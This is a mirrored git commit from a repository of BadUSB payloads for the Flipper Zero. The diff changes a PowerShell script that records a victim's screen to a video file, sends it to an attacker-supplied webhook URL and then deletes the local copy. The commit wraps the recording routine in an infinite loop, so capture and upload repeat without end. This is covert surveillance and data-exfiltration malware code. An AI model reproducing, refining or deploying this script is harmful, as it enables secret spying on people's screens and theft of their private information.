mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-26 04:41:41 -08:00
Update main.ps1
This commit is contained in:
@@ -8,6 +8,8 @@ This script records the screen for a specified time to a mkv file, then sends th
|
||||
$hookurl = "$dc"
|
||||
if ($hookurl.Ln -lt 120){$hookurl = (irm $hookurl).url}
|
||||
|
||||
while($true){
|
||||
|
||||
Function RecordScreen{
|
||||
param ([int[]]$t)
|
||||
if ($t.Length -eq 0){$t = 10}
|
||||
@@ -34,4 +36,6 @@ Function RecordScreen{
|
||||
rm -Path $mkvPath -Force
|
||||
}
|
||||
|
||||
RecordScreen
|
||||
RecordScreen
|
||||
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user